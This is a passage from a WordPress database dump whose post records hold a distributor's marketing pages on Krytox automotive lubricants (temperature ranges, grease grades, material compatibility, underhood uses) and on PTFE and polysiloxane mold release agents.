style="text-align: center;">-40–200 °C (-40–392 °F)</td>\r\n<td style="text-align: center;">100/12.3</td>\r\n<td style="text-align: center;">200 °C (392 °F)</td>\r\n<td style="text-align: center;">5,500+</td>\r\n</tr>\r\n<tr>\r\n<td>Krytox™ GPL 225</td>\r\n<td style="text-align: center;">-36–204 °C (-33–399 °F)</td>\r\n<td style="text-align: center;">160/18</td>\r\n<td style="text-align: center;">200 °C (392 °F)</td>\r\n<td style="text-align: center;">5,000+</td>\r\n</tr>\r\n<tr>\r\n<td>Krytox™ XHT AC</td>\r\n<td style="text-align: center;">-20–300 °C (-4–572 °F)</td>\r\n<td style="text-align: center;">500/47</td>\r\n<td style="text-align: center;">250 °C (482 °F)</td>\r\n<td style="text-align: center;">2,000+</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong>Compatibility with Elastomers and Plastics</strong>\r\n\r\nKrytox™ performance lubricants are compatible with the following common elastomers and plastics, as well as many more:\r\n<ul>\r\n 	<li>Fluorosilicone</li>\r\n 	<li>Hytrel® Polyester Elastomer</li>\r\n 	<li>Delrin® Acetal</li>\r\n 	<li>Ethylacrylate</li>\r\n 	<li>Methyl Silicone</li>\r\n 	<li>Butyl 325</li>\r\n 	<li>Neoprene WRT</li>\r\n 	<li>Kalrez® Fluoroelastomer*</li>\r\n 	<li>Zytel® Nylon</li>\r\n 	<li>Viton™ A Fluoroelastomer</li>\r\n 	<li>Nycar 100 (Buna N)</li>\r\n 	<li>Vespel®</li>\r\n 	<li>Urethane</li>\r\n 	<li>Hypalon® Synthetic Rubber</li>\r\n 	<li>EPT Peroxide Cure</li>\r\n 	<li>Hydrocarbon Rubber</li>\r\n 	<li>Teflon™ Fluoropolymer</li>\r\n</ul>\r\n<strong>Compatibility with Metals</strong>\r\n\r\nBecause of their low surface tensions, Krytox™ oils and greases easily lubricate metallic surfaces. Krytox™ lubricants are chemically inert and, therefore, have no adverse effect on metals when the temperature is below 288 °C (550 ºF).\r\n\r\nAbove this point, Krytox™ lubricants will be the best-in-class choice for many alloy steels, stainless steels, titanium alloy, nickel alloy, and cobalt alloy.\r\n\r\n<strong>Robust Electrical Properties</strong>\r\n\r\nKrytox™ oils are good insulators due to fundamental properties. Our synthetic fluorinated automotive lubricants are chemically inert, insoluble in most common solvents, and nonflammable.\r\n\r\n<strong>Advanced Rust and Corrosion Protection from Environmental Challenges</strong>\r\n\r\nKrytox™ lubricants are not sensitive to aggressive weather conditions, such as rain, snow, ice, dust, or grit, and they are extremely resistant to the harsh underhood chemical environment of fuel, coolant, brake fluid, engine oil, and washer solvent.\r\n\r\n<strong>Cost-Effective</strong>\r\n\r\nKrytox™ lubricants provide OEMs with significant cost savings when specified for use during the design phase. By lengthening the life of critical components, Krytox™ automotive lubricants reduce repair costs and potentially save millions in warranty claims.\r\n\r\nFigure 2 Krytox™ Performance Lubricants Product Range\r\n<table width="868">\r\n<tbody>\r\n<tr>\r\n<td width="250">Typical Automotive Lubricants Grade</td>\r\n<td style="text-align: center;" width="206">Description</td>\r\n<td style="text-align: center;" width="206">Base Oil Viscosity, cSt</td>\r\n<td style="text-align: center;" width="206">Useful Temperature Range</td>\r\n</tr>\r\n<tr>\r\n<td>Krytox™ GPL 104</td>\r\n<td>Clear, colorless oil</td>\r\n<td style="text-align: center;">60</td>\r\n<td style="text-align: center;">-51–179 °C (-60–354 °F)</td>\r\n</tr>\r\n<tr>\r\n<td>Krytox™ GPL 105</td>\r\n<td>Clear, colorless oil</td>\r\n<td style="text-align: center;">160</td>\r\n<td style="text-align: center;">-36–210 °C (-33–410 °F)</td>\r\n</tr>\r\n<tr>\r\n<td>Krytox™ AUT 1045</td>\r\n<td>Clear, colorless oil</td>\r\n<td style="text-align: center;">100</td>\r\n<td style="text-align: center;">-40–200 °C (-40–392 °F)</td>\r\n</tr>\r\n<tr>\r\n<td>Krytox™ GPL 204</td>\r\n<td>White, buttery additive-free grease</td>\r\n<td style="text-align: center;">60</td>\r\n<td style="text-align: center;">-51–179 °C (-60–354 °F)</td>\r\n</tr>\r\n<tr>\r\n<td>Krytox™ GPL 214</td>\r\n<td>Grease with extreme pressure additive</td>\r\n<td style="text-align: center;">60</td>\r\n<td style="text-align: center;">-51–179 °C (-60–354 °F)</td>\r\n</tr>\r\n<tr>\r\n<td>Krytox™ GPL 224</td>\r\n<td>White, buttery grease with sodium nitrite anti-corrosion additive</td>\r\n<td style="text-align: center;">60</td>\r\n<td style="text-align: center;">-51–179 °C (-60–354 °F)</td>\r\n</tr>\r\n<tr>\r\n<td>Krytox™ GPL 294</td>\r\n<td>Grease with extreme pressure and anti-corrosion additives</td>\r\n<td style="text-align: center;">60</td>\r\n<td style="text-align: center;">-51–179 °C (-60–354 °F)</td>\r\n</tr>\r\n<tr>\r\n<td>Krytox™ XP2A4</td>\r\n<td>Grease with soluble additive corrosion inhibitor</td>\r\n<td style="text-align: center;">60</td>\r\n<td style="text-align: center;">-51–179 °C (-60–354 °F)</td>\r\n</tr>\r\n<tr>\r\n<td>Krytox™ AUT 2045</td>\r\n<td>White, buttery additive-free grease</td>\r\n<td style="text-align: center;">100</td>\r\n<td style="text-align: center;">-40–200 °C (-40–392 °F)</td>\r\n</tr>\r\n<tr>\r\n<td>Krytox™ AUT 2245</td>\r\n<td>White, buttery grease with sodium nitrite anti-corrosion additive</td>\r\n<td style="text-align: center;">100</td>\r\n<td style="text-align: center;">-40–200 °C (-40–392 °F)</td>\r\n</tr>\r\n<tr>\r\n<td>Krytox™ AUT 2E45</td>\r\n<td>Grease with sodium nitrite-free anti-corrosion additive</td>\r\n<td style="text-align: center;">100</td>\r\n<td style="text-align: center;">-40–200 °C (-40–392 °F)</td>\r\n</tr>\r\n<tr>\r\n<td>Krytox™ AUT 2A45</td>\r\n<td>Grease with soluble additive corrosion inhibitor</td>\r\n<td style="text-align: center;">100</td>\r\n<td style="text-align: center;">-40–200 °C (-40–392 °F)</td>\r\n</tr>\r\n<tr>\r\n<td>Krytox™ GPL 205</td>\r\n<td>White, buttery additive-free grease</td>\r\n<td style="text-align: center;">160</td>\r\n<td style="text-align: center;">-36–210 °C (-33–410 °F)</td>\r\n</tr>\r\n<tr>\r\n<td>Krytox™ GPL 215</td>\r\n<td>Grease with extreme pressure additive</td>\r\n<td style="text-align: center;">160</td>\r\n<td style="text-align: center;">-36–210 °C (-33–410 °F)</td>\r\n</tr>\r\n<tr>\r\n<td>Krytox™ GPL 225</td>\r\n<td>White, buttery grease with sodium nitrite anti-corrosion additive</td>\r\n<td style="text-align: center;">160</td>\r\n<td style="text-align: center;">-36–210 °C (-33–410 °F)</td>\r\n</tr>\r\n<tr>\r\n<td>Krytox™ GPL 295</td>\r\n<td>Grease with extreme pressure and anti-corrosion additives</td>\r\n<td style="text-align: center;">160</td>\r\n<td style="text-align: center;">-36–210 °C (-33–410 °F)</td>\r\n</tr>\r\n<tr>\r\n<td>Krytox™ XP2A5</td>\r\n<td>Grease with soluble additive corrosion inhibitor</td>\r\n<td style="text-align: center;">160</td>\r\n<td style="text-align: center;">-36–210 °C (-33–410 °F)</td>\r\n</tr>\r\n<tr>\r\n<td>Krytox™ XP2C5</td>\r\n<td>Grease with anti-corrosion and anti-fretting additives</td>\r\n<td style="text-align: center;">160</td>\r\n<td style="text-align: center;">-36–210 °C (-33–410 °F)</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\nFigure 3 Krytox™ Performance Lubricants for Noise, Vibration, and Harshness (NVH) Eliminationless efficiently. When this occurs, the engine can overheat,\r\n\r\n<img class="alignnone size-medium wp-image-2391" src="https://www.miller-stephenson.com/wp-content/uploads/2016/10/Automotive-Grease-800x411.jpg" alt="Automotive Grease" width="800" height="411" />\r\n\r\n<strong>Krytox™ Performance Lubricants for Noise, Vibration, and Harshness</strong>\r\n\r\nWithin an automobile’s interior, there are several places where different materials contact each other. Some examples include metal on plastic, leather on leather, and weather-stripping. Movement between these surfaces often results in a series of noise described as squeak, itch, or judder. Krytox™ lubricants can permanently eliminate these noises. They are easy to apply, have low volatility, and can remain in place over the vehicle’s entire lifetime. Furthermore, Krytox™ oils and greases are compatible with a wide variety of materials, and have the frictional and long-life characteristics that make them ideal automotive lubricants in these applications.\r\n\r\n<strong>Krytox™ Performance Lubricants for Automotive Lubricants Underhood Applications</strong>\r\n\r\nFan Clutch\r\n\r\nA thermostatically controlled fan clutch typically drives the cooling fan. The bearings that support the drive shaft for this clutch regularly experience high temperatures. If these bearings wear and begin to fail, the cooling fan runs less efficiently. When this occurs, the engine can overheat, and any resistance in fan clutch rotation can drain valuable power from the engine’s drive shaft, further reducing overall performance. Krytox™ lubricants have low volatility and a high viscosity index, providing long-life and excellent lubrication to the fan clutch bearing under these high temperature conditions.\r\n\r\nO-Ring Lubrication/Assembly Lube\r\n\r\nO-rings effectively seal many interfaces in an automobile. A lubricant is often applied to keep seals in place during assembly and allow them to assemble without damage. Choice of lubricant is critical: if the wrong lubricant is used for a given seal material, the seal could degrade, prematurely causing serious damage. Krytox™ lubricants are the preferred choice because they are compatible with all seal materials. Furthermore, Krytox™ lubricants do not contribute to seal degradation, because they do not oxidize, and they have greater temperature stability than the seals.\r\n\r\nAlternator\r\n\r\nThe alternator is usually belt-driven by the engine and supplies electricity to basic automobile functions (headlights, radio, etc.) while recharging the car battery. As the electricity is being generated, the alternators, and hence the bearings, get very hot. Standard lubricants volatilize in the extreme high temperature environment of the alternator, leading to alternator bearing failure.\r\n\r\nAs the bearings wear and begin to fail, they can increase the alternator’s resistance to rotation.\r\n\r\nThis reduces the alternator’s performance and robs performance from the rest of the automobile.\r\n\r\nPerhaps more critically, if the alternator bearings fail, the alternator will fail and the vehicle will stop running. The higher output alternators used in today’s vehicles generate a tremendous amount of heat, demanding the advanced, reliable performance and heat stability of Krytox™ lubricants.\r\n\r\nEGR Valve\r\n\r\nThe exhaust gas re-circulating (EGR) valve reduces nitrogen oxide (NOx) emissions formation by re-circulating some of the exhausted gas back into the engine cylinders. This lowers the peak temperatures inside the cylinder; thus, reducing the rate of NOx formation. If the valve does not open enough, insufficient re-circulation takes place and excess pollution is created. If, however, the valve sticks open, the temperature inside the cylinder can drop too much, decreasing engine performance and fuel mileage. Krytox™ lubricants are an ideal choice, as they withstand the high temperatures and exhaust fumes experienced by the EGR valve.\r\n\r\nFigure 4 Krytox™ Performance Lubricants for Automotive Underhood Applications\r\n\r\n<img class="alignnone size-medium wp-image-2397" src="https://www.miller-stephenson.com/wp-content/uploads/2016/10/automotive-lubricants-800x411.jpg" alt="automotive-lubricants" width="800" height="411" />\r\n\r\nSpark Plug Boots\r\n\r\nThe spark plug boot protects the spark plug from weather and prevents the unintentional grounding of the spark energy.\r\n\r\nThe boot is made of a silicone rubber, which, over time, can bond with the silicon ceramic of the spark plug, fusing the boot and the spark plug together. Once this occurs, the only way to remove the boot is by force, which can cause enough damage to require replacement of the entire assembly. Krytox™ automotive lubricants can prevent this fusion from taking place. Krytox™ automotive lubricants are ideal in this application because they are stable, non-reactive, and long-lasting. They can also withstand the high temperatures and energies of the spark plug environment.\r\n\r\n<strong>The following Krytox lubricants are great automotive lubricants:</strong>\r\n\r\n[ux_product_categories number="10" parent="0" columns="4" title="Automotive Lubricants" ]\r\n\r\n<a href="https://www.miller-stephenson.com/krytox-automotive/">To learn more about non-bearing applications please click here.</a>\r\n\r\n<a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-gpl-series/">To learn more about Krytox GPL greases and oils, please click here. </a>\r\n\r\n<a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-aut-series/">To learn more about Krytox AUT greases please click here. </a>\r\n\r\n<a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-xp-oil/">To learn more about Krytox XP bearing greases please click here.</a>\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;', 'Krytox Solutions for the Automotive Industry', '', 'inherit', 'closed', 'closed', '', '2390-revision-v1', '', '', '2016-10-07 17:14:19', '2016-10-07 17:14:19', '', 2390, 'https://www.miller-stephenson.com/2390-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2402, 3, '2016-10-07 17:15:10', '2016-10-07 17:15:10', 'Mold release agents provide the critical barrier between a molding surface and the substrate, facilitating separation of the cured part from the mold. Without such a barrier in place the substrate would become fused to the mold surface, resulting in difficult clean-up and dramatic loss in production efficiency. Even when a mold release agent is used, factors such as irregular applications or improper release agent choice will have a dramatic effect on the quality and consistency of your finished product. It is therefore critical that  engineers understand what types of mold release agents are available and which variant would compliment their production method.  There are several distinct release agent agents: Sacrificial, PVA (polyvinyl alcohol), PTFE (polytetrafluoroethylene), and Thermoset polysiloxanes.  Critical criteria for each release agent to meet is the following:\r\n<ul>\r\n 	<li>Surface adhesion and durability</li>\r\n 	<li>Ability to form a thin-film</li>\r\n 	<li>Sufficient surface slip</li>\r\n 	<li>Chemical inertness to the molding process and molding substrate</li>\r\n 	<li>Number of releases per application</li>\r\n</ul>\r\nRelease agents types and individual products within those types, vary significantly in regard to slip, application methods, production efficiency and cost. For that reason,  manufacturers who invest time researching and testing release agents will see a return on that investment once an optimized agent is found.  Sacrificial (typically waxes and silicone oils) and PVA release agents are the lowest cost materials, offering adequate slip and chemical inertness.  Unfortunately these agents must be re-applied after each molding cycle, and will transfer to the molding part.  This result in time-consuming cleaning of the molded part.  Interestingly, while the initial cost may be lower for the sacrificial and PVA release agents, the overall cost is substantially more as one can expect  more releases per application and little to no post-operation cleaning with PTFE and thermosett resins.\r\n\r\nMiller-Stephenson specializes in providing only the highest performing and cost-effective mold release solutions for it customers, hence our companies specializes in providing PTFE and thermosetting polysiloxane release agent agents.  In an effort to help guide process engineers in selecting which agent would work best for their molding application we have summarized the leading attributes for each of our agents.\r\n\r\n<strong>PTFE Release Agents</strong>\r\n\r\n[caption id="attachment_1559" align="alignleft" width="256"]<img class="wp-image-1559" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/PTFE-mold-release-800x678.jpg" alt="ptfe-mold-release" width="256" height="216" /> Intricate molding die, an ideal application of the Miller-Stephenson\'s MS-122AV[/caption]\r\n\r\nMiller-Stephenson\'s PTFE mold release agents(MS-122/143) utilize low-molecular weight and particle size fluoropolymers to achieve ultra-uniform thin films that exhibit excellent surface adhesion and durability. PTFE-release agents contain no silicones, surfactants, or waxes and are thermally stable up to 600F.  These release agents generate a dry film on the mold surface, which is chemical inert, non-migrating and non-staining.  Formulations for this class of fluoropolymer can be solvent or water-based and application is typically performed with brushing, hand wiping, or aerosolization. Once the solvent is dried, the release coating is ready for operation, no  additional cure time is needed. Fluoropolymer release agents are particularly useful in rubber-to-metal bonding operations or when molding silicone or fluorosilicone polymers and elastomers.  PTFE has exceptional utility and can be use in compression and transfer molding operations, however due to its relatively low slip, it can be ineffective with injection molding operations.  Production engineers will typically choose PTFE-based release agents if they are looking for a non-silicone, chemical inert, and non-transferable release agent that is applicable across a broad range of substrates. PTFE, on a release per application basis is significantly more efficient and cost-effective than sacrificial or PVA alternatives.  Miller-Stephenson\'s MS-122AV and MS-122SE are formulations which increase the durability and cost-effectiveness even further by addition of proprietary surface activation chemistry.\r\n\r\n<strong>Thermoset polysiloxanes</strong>\r\n\r\n[caption id="attachment_1561" align="alignleft" width="272"]<img class="wp-image-1561" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/ReleaSys-polysiloxane-800x530.jpg" alt="releasys-polysiloxane" width="272" height="180" /> ReleaSys excels are molding of large composite structures, yielding efficient release cycle after cycle.[/caption]\r\n\r\nThermoset polysiloxanes are the newest generation of mold release agents, designed to crosslink and bind to the mold surface.  These semi-permanent mold release agents generate robust thin-films onto the mold surface, enabling numerous molding cycles to be completed with a single application.  Typically, thermosets require a cure-time to allow sufficient crosslinking and surface adhesion. Cured films are extremely durable, chemically-resistant, have high surface slip, and have temperature stability up to 410F.  Properly applied as a thin film, the release agent will not transfer to parts and therefore will not interfere with secondary adhesive bonds or coating operations.  Over application, however, may result in transfer, so Miller-Stephenson generally recommends training in the product\'s use by one of our technical staff.   Semi-permanents polysiloxanes can be designed to exhibit varying levels of slip, durability, and cure times.  Miller-Stephenson\'s new ReleaSys product line offers the most advanced semi-permanent thermoset mold release agents available.  ReleaSys excels in compression, transfer, and injection molding and is compatible with a broad range of resins and elastomers. Our formulations are particularly useful in geometrically complex molds or when using abrasive molding substrates.  ReleaSys should not be used to mold any silicone or fluorosilicone based products.  Application can be performed via aerosolization or brushing/wiping and formulations come as either solvent or water-based.  ReleaSys is Miller-Stephenson\'s most cost-effective, highest performing release agent capable of dramatically reduced re-application frequency, greater product throughput, and lower rejection rates.\r\n\r\nMiller-Stephenson mold release agents are backed by over 40 years of research and development and are relied upon by global industries to ensure efficient, cost effective, and high quality release of their molded parts. By pioneering release agent solutions for many of the largest manufacturing organizations, Miller-Stephenson understands what it takes to release the most complex materials in the most demanding molding applications. We have solutions which are optimized for your molding operations; from airplane stow bins to O-rings, carbon-fiber bike frames to tires, Miller-Stephenson has a solution for your molding operation.\r\n\r\n[ux_product_categories ids="21,16," number="10"]\r\n\r\nTo learn more about our mold release agents please <a href="https://www.miller-stephenson.com/chemicals/release-agents/">click here.</a>', 'Mold Release Agents: Which is right for you?', '', 'inherit', 'closed', 'closed', '', '1525-revision-v1', '', '', '2016-10-07 17:15:10', '2016-10-07 17:15:10', '', 1525, 'https://www.miller-stephenson.com/1525-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2403, 2, '2016-10-07 17:16:08', '2016-10-07 17:16:08', '<p><strong>Krytox™ Performance Lubricants | Automotive Lubricants specifically designed for Automotive needs</strong></p>\n<p>Powered by Chemours Science… Over the last fifty years, Krytox™ performance lubricants have helped customers outpace the competition by bringing customized and innovative solutions into an increasingly competitive automotive industry.</p>\n<p>Whatever your engineering challenge—longer part life, extreme temperatures, reduced failures—Krytox™ performance lubricants can help. At Chemours, we put our science to work to produce lubricants that can stand up under the extremely demanding conditions of today’s engineering design standards.</p>\n<p><strong>Advanced Solutions for the Automotive Industry | Automotive Lubricants</strong></p>\n<p>Krytox™ performance lubricants offer a wide range of high quality, high performance lubricants to address the most challenging and complex requirements of original equipment manufacturers (OEMs) and world-class Tier One suppliers.</p>\n<p>Our family of oils, greases, and coatings will provide long-term operational excellence and high performance lubrication in extreme operating conditions.</p>\n<p>Automotive design engineers have learned that specifying Krytox™ lubricants during the design phase can provide OEMs with significant cost savings. By lengthening the life of critical components and improving consumer satisfaction, Krytox™ lubricants help reduce repair costs and potentially save millions in warranty claims.</p>\n<p>Longer Lasting Lubrication</p>\n<p>Automakers are striving for extended warranties, expecting longer intervals between vehicle service visits and very limited relubrication operations. Krytox™ lubricants have provided state-of-the art performance for mechanical systems, such as gearboxes, bearings, chains, seals, actuators, valves, and other components. Krytox™ lubricants don’t oxidize; they provide excellent lubricity and a high viscosity index through a broad range of viscosity grades. Most applications where Krytox™ lubricants are specified are considered by OEMs to be lubricated for the expected lifetime of the vehicle.</p>\n<p><strong>The Right Choice for Your Design Challenge</strong></p>\n<p>Krytox™ oils and greases are based on perfluoropolyether (PFPE) oils, with a full range of viscosities available. These synthetic fluorinated lubricants are effective from -75 °C to greater than 400 °C (-103 to &gt;752 °F), depending upon operating conditions and product grade.</p>\n<p><strong>Krytox™ performance lubricants have properties that reduce impact on the environment:</strong></p>\n<ul>\n<li>Krytox™ products are fully synthetic—not petroleum-based—and totally inert, so Krytox™ oils and greases do not react with anything in the environment. Unlike other automotive lubricants, at temperatures under 350 ºC (662 °F), Krytox™ oil does not oxidize or break down into other substances that could be harmful.</li>\n<li>Krytox™ lubricants do not contain any volatile organic compounds (VOCs), according to the U.S. EPA definition. Our full fluorinated automotive lubricants are made of fluorine, oxygen, and carbon only.</li>\n<li>Krytox™ products have a very long service life. This means that products do not have to be replaced and disposed of frequently, which reduces waste.</li>\n<li>Because the Krytox™ molecule stays intact, the oils can be recycled if they become contaminated. The recycled products can then be returned to the customer for reuse.</li>\n<li>Krytox™ oils and greases are not considered hazardous wastes as manufactured under the U.S. EPA Resource and Recovery Conservation Act guidelines. However, treatment, storage, transportation, recycling, and disposal of these products must be in accordance with applicable federal, state/provincial, and local regulations.</li>\n</ul>\n<p><strong>The Right Choice for Our Environment</strong></p>\n<p>Protection of the environment and people is a core value of Chemours. Our sustainability goals go beyond traditional footprint reduction to include goals that tie our business growth to the development of safer and environmentally improved new products and sustainable solutions.</p>\n<p>Krytox™ lubricants provide longer lasting lubrication, which lowers the frequency of relubrication; therefore, reducing the use of materials and reducing waste—important steps in helping to reduce product impact on the environment.</p>\n<p><strong>Effective Over a Wide Temperature Range</strong></p>\n<p>Krytox™ greases typically last 5-50 times longer than standard greases. One common bearing test that demonstrates the extreme performance of various grades of Krytox™ grease is the ASTM D-3336 test method, where heating/cooling test cycles are continued until failure or the completion of a specified number of hours of running time.</p>\n<p>Test results have shown that Krytox™ greases can continue to perform beyond thousands of hours and at temperatures beyond the range specified for most applications—even outlasting the tester itself.</p>\n<p>Figure 1 Ball Bearing Grease Performance Test with Krytox™ Greases</p>\n<table width="1074">\n<tbody>\n<tr>\n<td width="250"><strong>Grade</strong></td>\n<td style="text-align: center;" width="206"><strong>Recommended Temperature Range</strong></td>\n<td style="text-align: center;" width="206"><strong>Viscosity 40°C/100°C</strong></td>\n<td style="text-align: center;" width="206"><strong>Test Temperature</strong></td>\n<td style="text-align: center;" width="206"><strong>Life, hr</strong></td>\n</tr>\n<tr>\n<td>Krytox™ GPL 224</td>\n<td style="text-align: center;">-51–179 °C (-60–354 °F)</td>\n<td style="text-align: center;">60/9</td>\n<td style="text-align: center;">180 °C (356 °F)</td>\n<td style="text-align: center;">4,900+</td>\n</tr>\n<tr>\n<td>Krytox™ AUT 2245</td>\n<td style="text-align: center;">-40–200 °C (-40–392 °F)</td>\n<td style="text-align: center;">100/12.3</td>\n<td style="text-align: center;">200 °C (392 °F)</td>\n<td style="text-align: center;">5,500+</td>\n</tr>\n<tr>\n<td>Krytox™ GPL 225</td>\n<td style="text-align: center;">-36–204 °C (-33–399 °F)</td>\n<td style="text-align: center;">160/18</td>\n<td style="text-align: center;">200 °C (392 °F)</td>\n<td style="text-align: center;">5,000+</td>\n</tr>\n<tr>\n<td>Krytox™ XHT AC</td>\n<td style="text-align: center;">-20–300 °C (-4–572 °F)</td>\n<td style="text-align: center;">500/47</td>\n<td style="text-align: center;">250 °C (482 °F)</td>\n<td style="text-align: center;">2,000+</td>\n</tr>\n</tbody>\n</table>\n<p><strong>Compatibility with Elastomers and Plastics</strong></p>\n<p>Krytox™ performance lubricants are compatible with the following common elastomers and plastics, as well as many more:</p>\n<ul>\n<li>Fluorosilicone</li>\n<li>Hytrel® Polyester Elastomer</li>\n<li>Delrin® Acetal</li>\n<li>Ethylacrylate</li>\n<li>Methyl Silicone</li>\n<li>Butyl 325</li>\n<li>Neoprene WRT</li>\n<li>Kalrez® Fluoroelastomer*</li>\n<li>Zytel® Nylon</li>\n<li>Viton™ A Fluoroelastomer</li>\n<li>Nycar 100 (Buna N)</li>\n<li>Vespel®</li>\n<li>Urethane</li>\n<li>Hypalon® Synthetic Rubber</li>\n<li>EPT Peroxide Cure</li>\n<li>Hydrocarbon Rubber</li>\n<li>Teflon™ Fluoropolymer</li>\n</ul>\n<p><strong>Compatibility with Metals</strong></p>\n<p>Because of their low surface tensions, Krytox™ oils and greases easily lubricate metallic surfaces. Krytox™ lubricants are chemically inert and, therefore, have no adverse effect on metals when the temperature is below 288 °C (550 ºF).</p>\n<p>Above this point, Krytox™ lubricants will be the best-in-class choice for many alloy steels, stainless steels, titanium alloy, nickel alloy, and cobalt alloy.</p>\n<p><strong>Robust Electrical Properties</strong></p>\n<p>Krytox™ oils are good insulators due to fundamental properties. Our synthetic fluorinated automotive lubricants are chemically inert, insoluble in most common solvents, and nonflammable.</p>\n<p><strong>Advanced Rust and Corrosion Protection from Environmental Challenges</strong></p>\n<p>Krytox™ lubricants are not sensitive to aggressive weather conditions, such as rain, snow, ice, dust, or grit, and they are extremely resistant to the harsh underhood chemical environment of fuel, coolant, brake fluid, engine oil, and washer solvent.</p>\n<p><strong>Cost-Effective</strong></p>\n<p>Krytox™ lubricants provide OEMs with significant cost savings when specified for use during the design phase. By lengthening the life of critical components, Krytox™ automotive lubricants reduce repair costs and potentially save millions in warranty claims.</p>\n<p>Figure 2 Krytox™ Performance Lubricants Product Range</p>\n<table width="868">\n<tbody>\n<tr>\n<td width="250">Typical Automotive Lubricants Grade</td>\n<td style="text-align: center;" width="206">Description</td>\n<td style="text-align: center;" width="206">Base Oil Viscosity, cSt</td>\n<td style="text-align: center;" width="206">Useful Temperature Range</td>\n</tr>\n<tr>\n<td>Krytox™ GPL 104</td>\n<td>Clear, colorless oil</td>\n<td style="text-align: center;">60</td>\n<td style="text-align: center;">-51–179 °C (-60–354 °F)</td>\n</tr>\n<tr>\n<td>Krytox™ GPL 105</td>\n<td>Clear, colorless oil</td>\n<td style="text-align: center;">160</td>\n<td style="text-align: center;">-36–210 °C (-33–410 °F)</td>\n</tr>\n<tr>\n<td>Krytox™ AUT 1045</td>\n<td>Clear, colorless oil</td>\n<td style="text-align: center;">100</td>\n<td style="text-align: center;">-40–200 °C (-40–392 °F)</td>\n</tr>\n<tr>\n<td>Krytox™ GPL 204</td>\n<td>White, buttery additive-free grease</td>\n<td style="text-align: center;">60</td>\n<td style="text-align: center;">-51–179 °C (-60–354 °F)</td>\n</tr>\n<tr>\n<td>Krytox™ GPL 214</td>\n<td>Grease with extreme pressure additive</td>\n<td style="text-align: center;">60</td>\n<td style="text-align: center;">-51–179 °C (-60–354 °F)</td>\n</tr>\n<tr>\n<td>Krytox™ GPL 224</td>\n<td>White, buttery grease with sodium nitrite anti-corrosion additive</td>\n<td style="text-align: center;">60</td>\n<td style="text-align: center;">-51–179 °C (-60–354 °F)</td>\n</tr>\n<tr>\n<td>Krytox™ GPL 294</td>\n<td>Grease with extreme pressure and anti-corrosion additives</td>\n<td style="text-align: center;">60</td>\n<td style="text-align: center;">-51–179 °C (-60–354 °F)</td>\n</tr>\n<tr>\n<td>Krytox™ XP2A4</td>\n<td>Grease with soluble additive corrosion inhibitor</td>\n<td style="text-align: center;">60</td>\n<td style="text-align: center;">-51–179 °C (-60–354 °F)</td>\n</tr>\n<tr>\n<td>Krytox™ AUT 2045</td>\n<td>White, buttery additive-free grease</td>\n<td style="text-align: center;">100</td>\n<td style="text-align: center;">-40–200 °C (-40–392 °F)</td>\n</tr>\n<tr>\n<td>Krytox™ AUT 2245</td>\n<td>White, buttery grease with sodium nitrite anti-corrosion additive</td>\n<td style="text-align: center;">100</td>\n<td style="text-align: center;">-40–200 °C (-40–392 °F)</td>\n</tr>\n<tr>\n<td>Krytox™ AUT 2E45</td>\n<td>Grease with sodium nitrite-free anti-corrosion additive</td>\n<td style="text-align: center;">100</td>\n<td style="text-align: center;">-40–200 °C (-40–392 °F)</td>\n</tr>\n<tr>\n<td>Krytox™ AUT 2A45</td>\n<td>Grease with soluble additive corrosion inhibitor</td>\n<td style="text-align: center;">100</td>\n<td style="text-align: center;">-40–200 °C (-40–392 °F)</td>\n</tr>\n<tr>\n<td>Krytox™ GPL 205</td>\n<td>White, buttery additive-free grease</td>\n<td style="text-align: center;">160</td>\n<td style="text-align: center;">-36–210 °C (-33–410 °F)</td>\n</tr>\n<tr>\n<td>Krytox™ GPL 215</td>\n<td>Grease with extreme pressure additive</td>\n<td style="text-align: center;">160</td>\n<td style="text-align: center;">-36–210 °C (-33–410 °F)</td>\n</tr>\n<tr>\n<td>Krytox™ GPL 225</td>\n<td>White, buttery grease with sodium nitrite anti-corrosion additive</td>\n<td style="text-align: center;">160</td>\n<td style="text-align: center;">-36–210 °C (-33–410 °F)</td>\n</tr>\n<tr>\n<td>Krytox™ GPL 295</td>\n<td>Grease with extreme pressure and anti-corrosion additives</td>\n<td style="text-align: center;">160</td>\n<td style="text-align: center;">-36–210 °C (-33–410 °F)</td>\n</tr>\n<tr>\n<td>Krytox™ XP2A5</td>\n<td>Grease with soluble additive corrosion inhibitor</td>\n<td style="text-align: center;">160</td>\n<td style="text-align: center;">-36–210 °C (-33–410 °F)</td>\n</tr>\n<tr>\n<td>Krytox™ XP2C5</td>\n<td>Grease with anti-corrosion and anti-fretting additives</td>\n<td style="text-align: center;">160</td>\n<td style="text-align: center;">-36–210 °C (-33–410 °F)</td>\n</tr>\n</tbody>\n</table>\n<p>Figure 3 Krytox™ Performance Lubricants for Noise, Vibration, and Harshness (NVH) Eliminationless efficiently. When this occurs, the engine can overheat,</p>\n<p><img class="alignnone size-medium wp-image-2391" src="https://www.miller-stephenson.com/wp-content/uploads/2016/10/Automotive-Grease-800x411.jpg" alt="Automotive Grease" width="800" height="411" /></p>\n<p><strong>Krytox™ Performance Lubricants for Noise, Vibration, and Harshness</strong></p>\n<p>Within an automobile’s interior, there are several places where different materials contact each other. Some examples include metal on plastic, leather on leather, and weather-stripping. Movement between these surfaces often results in a series of noise described as squeak, itch, or judder. Krytox™ lubricants can permanently eliminate these noises. They are easy to apply, have low volatility, and can remain in place over the vehicle’s entire lifetime. Furthermore, Krytox™ oils and greases are compatible with a wide variety of materials, and have the frictional and long-life characteristics that make them ideal automotive lubricants in these applications.</p>\n<p><strong>Krytox™ Performance Lubricants for Automotive Lubricants Underhood Applications</strong></p>\n<p>Fan Clutch</p>\n<p>A thermostatically controlled fan clutch typically drives the cooling fan. The bearings that support the drive shaft for this clutch regularly experience high temperatures. If these bearings wear and begin to fail, the cooling fan runs less efficiently. When this occurs, the engine can overheat, and any resistance in fan clutch rotation can drain valuable power from the engine’s drive shaft, further reducing overall performance. Krytox™ lubricants have low 